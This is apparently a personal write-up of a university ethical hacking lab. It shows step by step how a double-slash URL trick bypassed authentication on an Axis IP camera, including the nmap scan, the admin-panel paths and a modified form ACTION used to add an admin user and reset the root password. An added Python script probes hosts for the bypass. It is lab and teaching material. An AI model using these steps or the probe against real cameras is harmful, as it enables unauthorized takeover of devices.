Last year (2010), in my first Ethical Hacking lab, I had to bypass the HTTP authentication of an Axis IP camera using the Axis Network Camera HTTP Authentication Bypass flaw, create a new user with full privileges and change the root password. It was just a fun first lab to get an overview of the attendees' skills; at least two prerequisites were needed:
- Scanning (nmap, netdiscover, or similar)
- HTML (understanding how forms work)
The teacher set up the camera (i.e. plugged it into the network and configured it) but gave no information about it. To find the camera's IP, I ran an nmap scan to list every device on the network with the HTTP port (80) open:
Leopard:~ Tosch$ nmap -p 80 10.0.0.*
Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2010-10-01 17:34 BST
Nmap scan report for 10.0.0.100
Host is up (0.25s latency).
PORT   STATE SERVICE
80/tcp open  http
Nmap done: 256 IP addresses (66 hosts up) scanned in 11.34 seconds
(The computer that ran the nmap scan was connected to the camera's network, 10.0.0.0/24.)
The result shows that one device, with the IP 10.0.0.100, has port 80 open.
Browsing to http://10.0.0.100 redirected to http://10.0.0.100/view/index.shtml, with an authentication box asking for a username and a password.
To bypass this authentication, I used the flaw mentioned above by requesting http://10.0.0.100//admin/admin.shtml (note the double slash //). It worked: I had access to the administration panel. In the menu I selected System. Once again an authentication box appeared, so I added a slash after the IP to bypass it. In the System submenu I selected Users, which gave me a list of users and a form to add or modify them.
When I tried to add a user, it brought me back to the same page with no new user. I read the source code and, with Firebug, modified the ACTION of the form so that the request also went through the bypass, by adding a / (slash).
Here is the form before:
<FORM NAME="WizardForm" ACTION="/this_server/ServerManager.srv" METHOD="POST">
and after:
<FORM NAME="WizardForm" ACTION="http://10.0.0.100//this_server/ServerManager.srv" METHOD="POST">
Then I tried once again to add a user with full access, and it worked. It was possible to log in with the new credentials and change the root password.
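The two bypass steps above (requesting a protected page with a doubled leading slash, and re-pointing the form's ACTION through the same trick) as an added Python example. This is not code from the original post or from Axis: it probes a host for paths that answer 401 normally but 200 with the // prefix, and rewrites a relative ACTION into the absolute double-slash form. The host 10.0.0.100 and the two protected paths come from the write-up; the port, the timeout and the offline fake responder at the bottom are assumptions/constructed data so the logic can be exercised without a camera.

```python
"""Probe for the double-slash HTTP authentication bypass described above.

Added example, not from the original post or from Axis. A protected page
normally answers 401 (auth required); the bug is that the same resource
requested with a doubled leading slash is served without credentials. The
probe fetches both forms and flags any path where the normal request is
refused but the '//'-prefixed one returns 200.

The network call is isolated behind a `fetch` callable so the logic can be
run offline against a constructed fake responder (see bottom of file).
"""
import http.client
from typing import Callable, Dict, List, Tuple

# Protected resources named in the write-up; the host is the lab camera's
# address from the nmap scan. Port 80 and the timeout are assumptions.
DEFAULT_HOST = "10.0.0.100"
PROTECTED_PATHS = [
    "/admin/admin.shtml",
    "/this_server/ServerManager.srv",  # ACTION of the user-management form
]

Fetcher = Callable[[str, str], int]  # (host, request-target) -> HTTP status


def http_status(host: str, target: str, timeout: float = 5.0) -> int:
    """Send a raw GET for `target` and return the HTTP status code.

    http.client transmits the request-target exactly as given, so a leading
    '//' reaches the server unnormalised instead of being collapsed to '/'.
    """
    conn = http.client.HTTPConnection(host, 80, timeout=timeout)
    try:
        conn.request("GET", target)
        return conn.getresponse().status
    finally:
        conn.close()


def bypass_candidates(paths: List[str], host: str = DEFAULT_HOST,
                      fetch: Fetcher = http_status) -> Dict[str, Tuple[int, int]]:
    """Return {path: (status_normal, status_doubled)} for every path where the
    normal request demands auth (401) and the '//' form is served (200)."""
    found: Dict[str, Tuple[int, int]] = {}
    for path in paths:
        normal = fetch(host, path)
        doubled = fetch(host, "/" + path)  # '/admin/...' -> '//admin/...'
        if normal == 401 and doubled == 200:
            found[path] = (normal, doubled)
    return found


def doubled_action(action: str, host: str = DEFAULT_HOST) -> str:
    """Rewrite a root-relative form ACTION into the absolute double-slash
    URL used in the Firebug edit above, so the POST goes through the bypass."""
    if not action.startswith("/"):
        raise ValueError("expected a root-relative ACTION such as /this_server/...")
    return f"http://{host}/{action}"


# --- offline demo with a constructed responder ---------------------------
# Fake camera (constructed, not a recording of a real device): it refuses
# the protected paths unless the leading slash is doubled, which is exactly
# the behaviour the write-up exploits. Unknown paths return 404.
def fake_camera(host: str, target: str) -> int:
    if target.startswith("//"):
        return 200  # bypass: served without credentials
    if target in PROTECTED_PATHS:
        return 401
    return 404


if __name__ == "__main__":
    for path, (a, b) in bypass_candidates(PROTECTED_PATHS, fetch=fake_camera).items():
        print(f"{path}: {a} normally, {b} with doubled slash -> auth bypass")
    print("form ACTION ->", doubled_action("/this_server/ServerManager.srv"))
```

To run it against a real device in a lab, pass `fetch=http_status` (the default) and the camera's address; a fixed firmware answers 401 for both forms of the request and the probe returns an empty dictionary.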